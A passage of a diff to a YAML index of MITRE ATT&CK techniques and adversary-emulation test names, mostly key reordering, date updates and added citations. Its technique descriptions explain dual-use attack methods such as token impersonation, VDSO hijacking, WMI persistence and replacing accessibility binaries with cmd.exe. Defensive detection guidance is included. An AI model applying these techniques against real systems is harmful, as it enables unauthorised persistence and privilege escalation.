directly useful for defense unless collected under specific circumstances
@@ -7059,14 +7163,10 @@ privilege-escalation:
process behavior to determine if a process is performing actions it usually
does not, such as opening network connections, reading files, or other suspicious
actions that could relate to post-compromise behavior. "
- x_mitre_permissions_required:
- - User
- x_mitre_data_sources:
- - Process monitoring
- - API monitoring
- x_mitre_defense_bypassed:
- - Process whitelisting
- - Anti-virus
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Windows
atomic_tests: []
T1055.005:
technique:
@@ -7110,12 +7210,14 @@ privilege-escalation:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
- modified: '2020-02-21T22:41:25.118Z'
+ modified: '2020-06-20T22:23:30.093Z'
created: '2020-01-14T01:30:41.092Z'
- x_mitre_platforms:
- - Windows
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_defense_bypassed:
+ - Anti-virus
+ - Application control
+ x_mitre_data_sources:
+ - Process monitoring
+ - API monitoring
x_mitre_detection: "Monitoring Windows API calls indicative of the various types
of code injection may generate a significant amount of data and may not be
directly useful for defense unless collected under specific circumstances
@@ -7128,12 +7230,10 @@ privilege-escalation:
process behavior to determine if a process is performing actions it usually
does not, such as opening network connections, reading files, or other suspicious
actions that could relate to post-compromise behavior. "
- x_mitre_data_sources:
- - Process monitoring
- - API monitoring
- x_mitre_defense_bypassed:
- - Anti-virus
- - Process whitelisting
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Windows
atomic_tests: []
T1547.003:
technique:
@@ -7179,10 +7279,15 @@ privilege-escalation:
phase_name: privilege-escalation
modified: '2020-03-25T15:24:26.476Z'
created: '2020-01-24T15:51:52.317Z'
- x_mitre_platforms:
- - Windows
- x_mitre_contributors:
- - Scott Lundgren, @5twenty9, Carbon Black
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_permissions_required:
+ - SYSTEM
+ - Administrator
+ x_mitre_detection: |-
+ Baseline values and monitor/analyze activity related to modifying W32Time information in the Registry, including application programming interface (API) calls such as RegCreateKeyEx and RegSetValueEx as well as execution of the W32tm.exe utility. (Citation: Microsoft W32Time May 2017) There is no restriction on the number of custom time providers registrations, though each may require a DLL payload written to disk. (Citation: Github W32Time Oct 2017)
+
+ The Sysinternals Autoruns tool may also be used to analyze auto-starting locations, including DLLs listed as time providers. (Citation: TechNet Autoruns)
x_mitre_data_sources:
- API monitoring
- Binary file metadata
@@ -7190,18 +7295,30 @@ privilege-escalation:
- File monitoring
- Loaded DLLs
- Process monitoring
- x_mitre_detection: |-
- Baseline values and monitor/analyze activity related to modifying W32Time information in the Registry, including application programming interface (API) calls such as RegCreateKeyEx and RegSetValueEx as well as execution of the W32tm.exe utility. (Citation: Microsoft W32Time May 2017) There is no restriction on the number of custom time providers registrations, though each may require a DLL payload written to disk. (Citation: Github W32Time Oct 2017)
-
- The Sysinternals Autoruns tool may also be used to analyze auto-starting locations, including DLLs listed as time providers. (Citation: TechNet Autoruns)
- x_mitre_permissions_required:
- - SYSTEM
- - Administrator
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_contributors:
+ - Scott Lundgren, @5twenty9, Carbon Black
+ x_mitre_platforms:
+ - Windows
atomic_tests: []
T1134.001:
technique:
+ created: '2020-02-18T16:39:06.289Z'
+ modified: '2020-03-26T21:29:18.608Z'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ - kill_chain_name: mitre-attack
+ phase_name: privilege-escalation
+ type: attack-pattern
+ id: attack-pattern--86850eff-2729-40c3-b85e-c4af26da4a2d
+ description: |-
+ Adversaries may duplicate then impersonate another user's token to escalate privileges and bypass access controls. An adversary can create a new access token that duplicates an existing token using DuplicateToken(Ex). The token can then be used with ImpersonateLoggedOnUser to allow the calling thread to impersonate a logged on user's security context, or with SetThreadToken to assign the impersonated token to a thread.
+
+ An adversary may do this when they have a specific, existing process they want to assign the new token to. For example, this may be useful for when the target user has a non-network logon session on the system.
+ name: Token Impersonation/Theft
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
external_references:
- source_name: mitre-attack
external_id: T1134.001
@@ -7210,23 +7327,6 @@ privilege-escalation:
description: Mathers, B. (2017, March 7). Command line process auditing. Retrieved
April 21, 2017.
source_name: Microsoft Command-line Logging
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Token Impersonation/Theft
- description: |-
- Adversaries may duplicate then impersonate another user's token to escalate privileges and bypass access controls. An adversary can create a new access token that duplicates an existing token using DuplicateToken(Ex). The token can then be used with ImpersonateLoggedOnUser to allow the calling thread to impersonate a logged on user's security context, or with SetThreadToken to assign the impersonated token to a thread.
-
- An adversary may do this when they have a specific, existing process they want to assign the new token to. For example, this may be useful for when the target user has a non-network logon session on the system.
- id: attack-pattern--86850eff-2729-40c3-b85e-c4af26da4a2d
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: defense-evasion
- - kill_chain_name: mitre-attack
- phase_name: privilege-escalation
- modified: '2020-03-26T21:29:18.608Z'
- created: '2020-02-18T16:39:06.289Z'
x_mitre_platforms:
- Windows
x_mitre_data_sources:
@@ -7275,22 +7375,22 @@ privilege-escalation:
phase_name: persistence
modified: '2020-03-24T16:43:02.273Z'
created: '2020-01-24T14:17:43.906Z'
- x_mitre_platforms:
- - macOS
- - Linux
- x_mitre_data_sources:
- - Process command-line parameters
- - Process monitoring
- - File monitoring
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_permissions_required:
+ - User
+ - Administrator
x_mitre_detection: Trap commands must be registered for the shell or programs,
so they appear in files. Monitoring files for suspicious or overly broad trap
commands can narrow down suspicious behavior during an investigation. Monitor
for suspicious processes executed through trap interrupts.
- x_mitre_permissions_required:
- - User
- - Administrator
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - Process command-line parameters
+ - Process monitoring
+ - File monitoring
+ x_mitre_platforms:
+ - macOS
+ - Linux
identifier: T1546.005
atomic_tests:
- name: Trap
@@ -7312,19 +7412,22 @@ privilege-escalation:
id: attack-pattern--98be40f2-c86b-4ade-b6fc-4964932040e5
description: "Adversaries may inject malicious code into processes via VDSO
hijacking in order to evade process-based defenses as well as possibly elevate
- privileges. Virtual dynamic shared object (VDSO) hijacking is a method of
+ privileges. Virtual dynamic shared object (vdso) hijacking is a method of
executing arbitrary code in the address space of a separate live process.
\n\nVDSO hijacking involves redirecting calls to dynamically linked shared
- libraries mapped into all user-land processes by the kernel. An adversary
- may patch memory address references stored in a process' global offset table
- (which store absolute addresses of functions) to inject malicious code into
- a running process. This code can then be invoked by redirecting the execution
- flow of the process (ex: using custom shellcode or hijacked system calls).
- (Citation: ELF Injection May 2009) \n\nRunning code in the context of another
- process may allow access to the process's memory, system/network resources,
- and possibly elevated privileges. Execution via VDSO hijacking may also evade
- detection from security products since the execution is masked under a legitimate
- process. "
+ libraries. Memory protections may prevent writing executable code to a process
+ via [Ptrace System Calls](https://attack.mitre.org/techniques/T1055/008).
+ However, an adversary may hijack the syscall interface code stubs mapped into
+ a process from the vdso shared object to execute syscalls to open and map
+ a malicious shared object. This code can then be invoked by redirecting the
+ execution flow of the process via patched memory address references stored
+ in a process' global offset table (which store absolute addresses of mapped
+ library functions).(Citation: ELF Injection May 2009) (Citation: Backtrace
+ VDSO) (Citation: VDSO Aug 2005) (Citation: Syscall 2014)\n\nRunning code in
+ the context of another process may allow access to the process's memory, system/network
+ resources, and possibly elevated privileges. Execution via VDSO hijacking
+ may also evade detection from security products since the execution is masked
+ under a legitimate process. "
name: VDSO Hijacking
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
object_marking_refs:
@@ -7337,6 +7440,18 @@ privilege-escalation:
url: https://web.archive.org/web/20150711051625/http://vxer.org/lib/vrn00.html
description: O'Neill, R. (2009, May). Modern Day ELF Runtime infection via
GOT poisoning. Retrieved March 15, 2020.
+ - source_name: Backtrace VDSO
+ url: https://backtrace.io/blog/backtrace/elf-shared-library-injection-forensics/
+ description: backtrace. (2016, April 22). ELF SHARED LIBRARY INJECTION FORENSICS.
+ Retrieved June 15, 2020.
+ - source_name: VDSO Aug 2005
+ url: https://web.archive.org/web/20051013084246/http://www.trilithium.com/johan/2005/08/linux-gate/
+ description: Petersson, J. (2005, August 14). What is linux-gate.so.1?. Retrieved
+ June 16, 2020.
+ - source_name: Syscall 2014
+ url: https://lwn.net/Articles/604515/
+ description: Drysdale, D. (2014, July 16). Anatomy of a system call, part
+ 2. Retrieved June 16, 2020.
- description: 'Ligh, M.H. et al.. (2014, July). The Art of Memory Forensics:
Detecting Malware and Threats in Windows, Linux, and Mac Memory. Retrieved
December 20, 2017.'
@@ -7345,7 +7460,7 @@ privilege-escalation:
description: GNU. (2010, February 5). The GNU Accounting Utilities. Retrieved
December 20, 2017.
source_name: GNU Acct
- - url: https://access.redhat.com/documentation/red_hat_enterprise_linux/6/html/security_guide/chap-system_auditing
+ - url: https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/security_guide/chap-system_auditing
description: Jahoda, M. et al.. (2017, March 14). redhat Security Guide -
Chapter 7 - System Auditing. Retrieved December 20, 2017.
source_name: RHEL auditd
@@ -7359,16 +7474,11 @@ privilege-escalation:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
- modified: '2020-03-26T20:58:10.186Z'
+ modified: '2020-06-20T22:28:45.232Z'
created: '2020-01-14T01:35:00.781Z'
- x_mitre_version: '1.0'
- x_mitre_is_subtechnique: true
- x_mitre_platforms:
- - Linux
- - macOS
- x_mitre_data_sources:
- - System calls
- - Process monitoring
+ x_mitre_defense_bypassed:
+ - Anti-virus
+ - Application control
x_mitre_detection: "Monitor for malicious usage of system calls, such as ptrace
and mmap, that can be used to attach to, manipulate memory, then redirect
a processes' execution path. Monitoring for Linux specific calls such as the
@@ -7379,9 +7489,13 @@ privilege-escalation:
\n\nAnalyze process behavior to determine if a process is performing actions
it usually does not, such as opening network connections, reading files, or
other suspicious actions that could relate to post-compromise behavior. "
- x_mitre_defense_bypassed:
- - Anti-virus
- - Process whitelisting
+ x_mitre_data_sources:
+ - System calls
+ - Process monitoring
+ x_mitre_platforms:
+ - Linux
+ x_mitre_is_subtechnique: true
+ x_mitre_version: '1.0'
atomic_tests: []
T1078:
technique:
@@ -7419,31 +7533,13 @@ privilege-escalation:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: initial-access
- modified: '2020-03-23T21:59:36.955Z'
+ modified: '2020-06-20T22:44:36.043Z'
created: '2017-05-31T21:31:00.645Z'
- x_mitre_version: '2.1'
- x_mitre_data_sources:
- - AWS CloudTrail logs
- - Stackdriver logs
- - Authentication logs
- - Process monitoring
- x_mitre_defense_bypassed:
- - Firewall
- - Host intrusion prevention systems
- - Network intrusion detection system
- - Process whitelisting
- - System access controls
- - Anti-virus
- x_mitre_detection: |-
- Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services. (Citation: TechNet Audit Policy) Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).
-
- Perform regular audits of domain and local system accounts to detect accounts that may have been created by an adversary for persistence. Checks on these accounts could also include whether default accounts such as Guest have been activated. These audits should also include checks on any appliances and applications for default credentials or SSH keys, and if any are discovered, they should be updated immediately.
- x_mitre_permissions_required:
- - User
- - Administrator
- x_mitre_effective_permissions:
- - User
- - Administrator
+ x_mitre_is_subtechnique: false
+ x_mitre_contributors:
+ - Netskope
+ - Mark Wee
+ - Praetorian
x_mitre_platforms:
- Linux
- macOS
@@ -7454,11 +7550,29 @@ privilege-escalation:
- SaaS
- Office 365
- Azure AD
- x_mitre_contributors:
- - Netskope
- - Mark Wee
- - Praetorian
- x_mitre_is_subtechnique: false
+ x_mitre_effective_permissions:
+ - User
+ - Administrator
+ x_mitre_permissions_required:
+ - User
+ - Administrator
+ x_mitre_detection: |-
+ Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services. (Citation: TechNet Audit Policy) Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).
+
+ Perform regular audits of domain and local system accounts to detect accounts that may have been created by an adversary for persistence. Checks on these accounts could also include whether default accounts such as Guest have been activated. These audits should also include checks on any appliances and applications for default credentials or SSH keys, and if any are discovered, they should be updated immediately.
+ x_mitre_defense_bypassed:
+ - Firewall
+ - Host intrusion prevention systems
+ - Network intrusion detection system
+ - Application control
+ - System access controls
+ - Anti-virus
+ x_mitre_data_sources:
+ - AWS CloudTrail logs
+ - Stackdriver logs
+ - Authentication logs
+ - Process monitoring
+ x_mitre_version: '2.1'
atomic_tests: []
T1546.003:
technique:
@@ -7470,6 +7584,14 @@ privilege-escalation:
description: 'Mandiant. (2015, February 24). M-Trends 2015: A View from the
Front Lines. Retrieved May 18, 2016.'
source_name: Mandiant M-Trends 2015
+ - source_name: FireEye WMI SANS 2015
+ url: https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/sans-dfir-2015.pdf
+ description: Devon Kerr. (2015). There's Something About WMI. Retrieved May
+ 4, 2020.
+ - url: https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-windows-management-instrumentation.pdf
+ description: Ballenthin, W., et al. (2015). Windows Management Instrumentation
+ (WMI) Offense, Defense, and Forensics. Retrieved March 30, 2016.
+ source_name: FireEye WMI 2015
- url: https://www.secureworks.com/blog/wmi-persistence
description: Dell SecureWorks Counter Threat Unit™ (CTU) Research Team. (2016,
March 28). A Novel WMI Persistence Implementation. Retrieved March 30, 2016.
@@ -7496,7 +7618,7 @@ privilege-escalation:
description: |-
Adversaries may establish persistence and elevate privileges by executing malicious content triggered by a Windows Management Instrumentation (WMI) event subscription. WMI can be used to install event filters, providers, consumers, and bindings that execute code when a defined event occurs. Examples of events that may be subscribed to are the wall clock time, user loging, or the computer's uptime. (Citation: Mandiant M-Trends 2015)
- Adversaries may use the capabilities of WMI to subscribe to an event and execute arbitrary code when that event occurs, providing persistence on a system. Adversaries may also compile WMI scripts into Windows Management Object (MOF) files (.mof extension) that can be used to create a malicious subscription. (Citation: Dell WMI Persistence) (Citation: Microsoft MOF May 2018)
+ Adversaries may use the capabilities of WMI to subscribe to an event and execute arbitrary code when that event occurs, providing persistence on a system. (Citation: FireEye WMI SANS 2015) (Citation: FireEye WMI 2015) Adversaries may also compile WMI scripts into Windows Management Object (MOF) files (.mof extension) that can be used to create a malicious subscription. (Citation: Dell WMI Persistence) (Citation: Microsoft MOF May 2018)
WMI subscription execution is proxied by the WMI Provider Host process (WmiPrvSe.exe) and thus may result in elevated SYSTEM privileges.
id: attack-pattern--910906dd-8c0a-475a-9cc1-5e029e2fad58
@@ -7506,23 +7628,23 @@ privilege-escalation:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: persistence
- modified: '2020-03-24T14:58:13.113Z'
+ modified: '2020-05-05T12:02:45.522Z'
created: '2020-01-24T14:07:56.276Z'
- x_mitre_platforms:
- - Windows
- x_mitre_data_sources:
- - Process command-line parameters
- - Process monitoring
- - WMI Objects
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_permissions_required:
+ - Administrator
+ - SYSTEM
x_mitre_detection: |-
Monitor WMI event subscription entries, comparing current WMI event subscriptions to known good subscriptions for each host. Tools such as Sysinternals Autoruns may also be used to detect WMI changes that could be attempts at persistence. (Citation: TechNet Autoruns) (Citation: Medium Detecting WMI Persistence)
Monitor processes and command-line arguments that can be used to register WMI persistence, such as the Register-WmiEvent [PowerShell](https://attack.mitre.org/techniques/T1086) cmdlet (Citation: Microsoft Register-WmiEvent), as well as those that result from the execution of subscriptions (i.e. spawning from the WmiPrvSe.exe WMI Provider Host process).
- x_mitre_permissions_required:
- - Administrator
- - SYSTEM
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - Process command-line parameters
+ - Process monitoring
+ - WMI Objects
+ x_mitre_platforms:
+ - Windows
identifier: T1546.003
atomic_tests:
- name: Persistence via WMI Event Subscription
@@ -7617,20 +7739,10 @@ privilege-escalation:
phase_name: privilege-escalation
modified: '2020-03-25T22:22:10.041Z'
created: '2020-01-17T19:13:50.402Z'
- x_mitre_contributors:
- - Matthew Demaske, Adaptforward
- - Travis Smith, Tripwire
- - Pedro Harrison
- x_mitre_data_sources:
- - API monitoring
- - Windows event logs
- - Process command-line parameters
- - Process monitoring
- - File monitoring
- - Windows Registry
- x_mitre_effective_permissions:
- - Administrator
- - SYSTEM
+ x_mitre_platforms:
+ - Windows
+ x_mitre_is_subtechnique: true
+ x_mitre_version: '1.0'
x_mitre_detection: "Monitor processes and command-line arguments for actions
that could create or modify services. Command-line invocation of tools capable
of adding or modifying services may be unusual, depending on how systems are
@@ -7659,10 +7771,20 @@ privilege-escalation:
as part of a chain of behavior that could lead to other activities, such as
network connections made for Command and Control, learning details about the
environment through Discovery, and Lateral Movement."
- x_mitre_version: '1.0'
- x_mitre_is_subtechnique: true
- x_mitre_platforms:
- - Windows
+ x_mitre_effective_permissions:
+ - Administrator
+ - SYSTEM
+ x_mitre_data_sources:
+ - API monitoring
+ - Windows event logs
+ - Process command-line parameters
+ - Process monitoring
+ - File monitoring
+ - Windows Registry
+ x_mitre_contributors:
+ - Matthew Demaske, Adaptforward
+ - Travis Smith, Tripwire
+ - Pedro Harrison
identifier: T1543.003
atomic_tests:
- name: Modify Fax service to run PowerShell
@@ -7748,26 +7870,16 @@ privilege-escalation:
catch {}
T1547.004:
technique:
- external_references:
- - source_name: mitre-attack
- external_id: T1547.004
- url: https://attack.mitre.org/techniques/T1547/004
- - external_id: CAPEC-579
- source_name: capec
- url: https://capec.mitre.org/data/definitions/579.html
- - url: https://blog.cylance.com/windows-registry-persistence-part-2-the-run-keys-and-search-order
- description: 'Langendorf, S. (2013, September 24). Windows Registry Persistence,
- Part 2: The Run Keys and Search-Order. Retrieved April 11, 2018.'
- source_name: Cylance Reg Persistence Sept 2013
- - url: https://technet.microsoft.com/en-us/sysinternals/bb963902
- description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51.
- Retrieved June 6, 2016.
- source_name: TechNet Autoruns
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Winlogon Helper DLL
- description: "\nAdversaries may abuse features of Winlogon to execute DLLs and/or
+ created: '2020-01-24T16:59:59.688Z'
+ modified: '2020-04-21T16:00:41.277Z'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: persistence
+ - kill_chain_name: mitre-attack
+ phase_name: privilege-escalation
+ type: attack-pattern
+ id: attack-pattern--6836813e-8ec8-4375-b459-abb388cb1a35
+ description: "Adversaries may abuse features of Winlogon to execute DLLs and/or
executables when a user logs in. Winlogon.exe is a Windows component responsible
for actions at logon/logoff as well as the secure attention sequence (SAS)
triggered by Ctrl-Alt-Delete. Registry entries in HKLM\\Software[\\\\Wow6432Node\\\\]\\Microsoft\\Windows
@@ -7783,15 +7895,25 @@ privilege-escalation:
user logs on\n* Winlogon\\Shell - points to explorer.exe, the system shell
executed when a user logs on\n\nAdversaries may take advantage of these features
to repeatedly execute malicious code and establish persistence."
- id: attack-pattern--6836813e-8ec8-4375-b459-abb388cb1a35
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: persistence
- - kill_chain_name: mitre-attack
- phase_name: privilege-escalation
- modified: '2020-03-25T16:17:22.487Z'
- created: '2020-01-24T16:59:59.688Z'
+ name: Winlogon Helper DLL
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1547.004
+ url: https://attack.mitre.org/techniques/T1547/004
+ - external_id: CAPEC-579
+ source_name: capec
+ url: https://capec.mitre.org/data/definitions/579.html
+ - url: https://blog.cylance.com/windows-registry-persistence-part-2-the-run-keys-and-search-order
+ description: 'Langendorf, S. (2013, September 24). Windows Registry Persistence,
+ Part 2: The Run Keys and Search-Order. Retrieved April 11, 2018.'
+ source_name: Cylance Reg Persistence Sept 2013
+ - url: https://technet.microsoft.com/en-us/sysinternals/bb963902
+ description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51.
+ Retrieved June 6, 2016.
+ source_name: TechNet Autoruns
x_mitre_platforms:
- Windows
x_mitre_contributors:
@@ -7911,24 +8033,24 @@ persistence:
phase_name: persistence
modified: '2020-03-24T16:28:04.990Z'
created: '2020-01-24T14:13:45.936Z'
- x_mitre_platforms:
- - Linux
- - macOS
- x_mitre_data_sources:
- - Process use of network
- - Process command-line parameters
- - Process monitoring
- - File monitoring
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_permissions_required:
+ - User
+ - Administrator
x_mitre_detection: While users may customize their ~/.bashrc and
~/.bash_profile files , there are only certain types of commands
that typically appear in these files. Monitor for abnormal commands such as
execution of unknown programs, opening network sockets, or reaching out across
the network when user profiles are loaded during the login process.
- x_mitre_permissions_required:
- - User
- - Administrator
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - Process use of network
+ - Process command-line parameters
+ - Process monitoring
+ - File monitoring
+ x_mitre_platforms:
+ - Linux
+ - macOS
identifier: T1546.004
atomic_tests:
- name: Add command to .bash_profile
@@ -7977,8 +8099,8 @@ persistence:
source_name: capec
url: https://capec.mitre.org/data/definitions/558.html
- url: https://www.fireeye.com/blog/threat-research/2012/08/hikit-rootkit-advanced-persistent-attack-techniques-part-1.html
- description: 'Glyer, C., Kazanciyan, R. (2012, August 20). THE “HIKIT” ROOTKIT:
- ADVANCED AND PERSISTENT ATTACK TECHNIQUES (PART 1). Retrieved June 6, 2016.'
+ description: 'Glyer, C., Kazanciyan, R. (2012, August 20). The “Hikit” Rootkit:
+ Advanced and Persistent Attack Techniques (Part 1). Retrieved June 6, 2016.'
source_name: FireEye Hikit Rootkit
- url: https://www.slideshare.net/DennisMaldonado5/sticky-keys-to-the-kingdom
description: Maldonado, D., McGuffin, T. (2016, August 6). Sticky Keys to
@@ -7988,6 +8110,10 @@ persistence:
description: Tilbury, C. (2014, August 28). Registry Analysis with CrowdResponse.
Retrieved November 12, 2014.
source_name: Tilbury 2014
+ - source_name: Narrator Accessibility Abuse
+ url: https://giuliocomi.blogspot.com/2019/10/abusing-windows-10-narrators-feedback.html
+ description: Comi, G. (2019, October 19). Abusing Windows 10 Narrator's 'Feedback-Hub'
+ URI for Fileless Persistence. Retrieved April 28, 2020.
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
@@ -8001,7 +8127,7 @@ persistence:
For simple binary replacement on Windows XP and later as well as and Windows Server 2003/R2 and later, for example, the program (e.g., C:\Windows\System32\utilman.exe) may be replaced with "cmd.exe" (or another program that provides backdoor access). Subsequently, pressing the appropriate key combination at the login screen while sitting at the keyboard or when connected over [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001) will cause the replaced file to be executed with SYSTEM privileges. (Citation: Tilbury 2014)
- Other accessibility features exist that may also be leveraged in a similar fashion: (Citation: DEFCON2016 Sticky Keys)
+ Other accessibility features exist that may also be leveraged in a similar fashion: (Citation: DEFCON2016 Sticky Keys)(Citation: Narrator Accessibility Abuse)
* On-Screen Keyboard: C:\Windows\System32\osk.exe
* Magnifier: C:\Windows\System32\Magnify.exe
@@ -8015,29 +8141,29 @@ persistence:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: persistence
- modified: '2020-03-24T19:11:19.022Z'
+ modified: '2020-05-13T20:37:30.048Z'
created: '2020-01-24T14:32:40.315Z'
- x_mitre_platforms:
- - Windows
- x_mitre_contributors:
- - Paul Speulstra, AECOM Global Security Operations Center
- x_mitre_data_sources:
- - Process command-line parameters
- - Process monitoring
- - File monitoring
- - Windows Registry
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_effective_permissions:
+ - SYSTEM
+ x_mitre_permissions_required:
+ - Administrator
x_mitre_detection: Changes to accessibility utility binaries or binary paths
that do not correlate with known software, patch cycles, etc., are suspicious.
Command line invocation of tools capable of modifying the Registry for associated
keys are also suspicious. Utility arguments and the binaries themselves should
be monitored for changes. Monitor Registry keys within HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options.
- x_mitre_permissions_required:
- - Administrator
- x_mitre_effective_permissions:
- - SYSTEM
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - Process command-line parameters
+ - Process monitoring
+ - File monitoring
+ - Windows Registry
+ x_mitre_contributors:
+ - Paul Speulstra, AECOM Global Security Operations Center
+ x_mitre_platforms:
+ - Windows
identifier: T1546.008
atomic_tests:
- name: Attaches Command Prompt as a Debugger to a List of Target Processes
@@ -8121,8 +8247,23 @@ persistence:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: persistence
- modified: '2020-03-28T21:11:58.156Z'
+ modified: '2020-07-15T12:43:37.469Z'
created: '2017-05-31T21:31:12.196Z'
+ x_mitre_is_subtechnique: false
+ x_mitre_version: '2.1'
+ x_mitre_contributors:
+ - Jannie Li, Microsoft Threat Intelligence Center (MSTIC)
+ - Praetorian
+ - Tim MalcomVetter
+ x_mitre_data_sources:
+ - Authentication logs
+ - Windows event logs
+ x_mitre_detection: |-
+ Collect events that correlate with changes to account objects and/or permissions on systems and the domain, such as event IDs 4738, 4728 and 4670.(Citation: Microsoft User Modified Event)(Citation: Microsoft Security Event 4670)(Citation: Microsoft Security Event 4670) Monitor for modification of accounts in correlation with other suspicious activity. Changes may occur at unusual times or from unusual systems. Especially flag events where the subject and target accounts differ(Citation: InsiderThreat ChangeNTLM July 2017) or that include additional flags such as changing a password without knowledge of the old password.(Citation: GitHub Mimikatz Issue 92 June 2017)
+
+ Monitor for use of credentials at unusual times or to unusual systems or services. This may also correlate with other suspicious activity.
+
+ Monitor for unusual permissions changes that may indicate excessively broad permissions being granted to compromised accounts.
x_mitre_platforms:
- Windows
- Office 365
@@ -8130,21 +8271,8 @@ persistence:
- GCP
- Azure AD
- AWS
- x_mitre_detection: |-
- Collect events that correlate with changes to account objects and/or permissions on systems and the domain, such as event IDs 4738, 4728 and 4670.(Citation: Microsoft User Modified Event)(Citation: Microsoft Security Event 4670)(Citation: Microsoft Security Event 4670) Monitor for modification of accounts in correlation with other suspicious activity. Changes may occur at unusual times or from unusual systems. Especially flag events where the subject and target accounts differ(Citation: InsiderThreat ChangeNTLM July 2017) or that include additional flags such as changing a password without knowledge of the old password.(Citation: GitHub Mimikatz Issue 92 June 2017)
-
- Monitor for use of credentials at unusual times or to unusual systems or services. This may also correlate with other suspicious activity.
-
- Monitor for unusual permissions changes that may indicate excessively broad permissions being granted to compromised accounts.
- x_mitre_data_sources:
- - Authentication logs
- - Windows event logs
- x_mitre_contributors:
- - Jannie Li, Microsoft Threat Intelligence Center (MSTIC)
- - Praetorian
- - Tim MalcomVetter
- x_mitre_version: '2.1'
- x_mitre_is_subtechnique: false
+ - Linux
+ - macOS
identifier: T1098
atomic_tests:
- name: Admin Account Manipulate
@@ -8207,20 +8335,20 @@ persistence:
phase_name: persistence
modified: '2020-03-24T12:40:02.331Z'
created: '2020-01-19T16:59:45.362Z'
- x_mitre_platforms:
- - Office 365
- x_mitre_contributors:
- - Microsoft Threat Intelligence Center (MSTIC)
- x_mitre_data_sources:
- - Office 365 audit logs
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_permissions_required:
+ - Administrator
x_mitre_detection: 'Collect usage logs from cloud administrator accounts to
identify unusual activity in the assignment of roles to those accounts. Monitor
for accounts assigned to admin roles that go over a certain threshold of known
admins. '
- x_mitre_permissions_required:
- - Administrator
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - Office 365 audit logs
+ x_mitre_contributors:
+ - Microsoft Threat Intelligence Center (MSTIC)
+ x_mitre_platforms:
+ - Office 365
atomic_tests: []
T1137.006:
technique:
@@ -8264,23 +8392,23 @@ persistence:
phase_name: persistence
modified: '2020-03-26T17:34:02.877Z'
created: '2019-11-07T19:52:52.801Z'
- x_mitre_platforms:
- - Windows
- - Office 365
+ x_mitre_is_subtechnique: true
+ x_mitre_version: '1.0'
+ x_mitre_permissions_required:
+ - Administrator
+ - User
+ x_mitre_detection: |-
+ Monitor and validate the Office trusted locations on the file system and audit the Registry entries relevant for enabling add-ins.(Citation: GlobalDotName Jun 2019)(Citation: MRWLabs Office Persistence Add-ins)
+
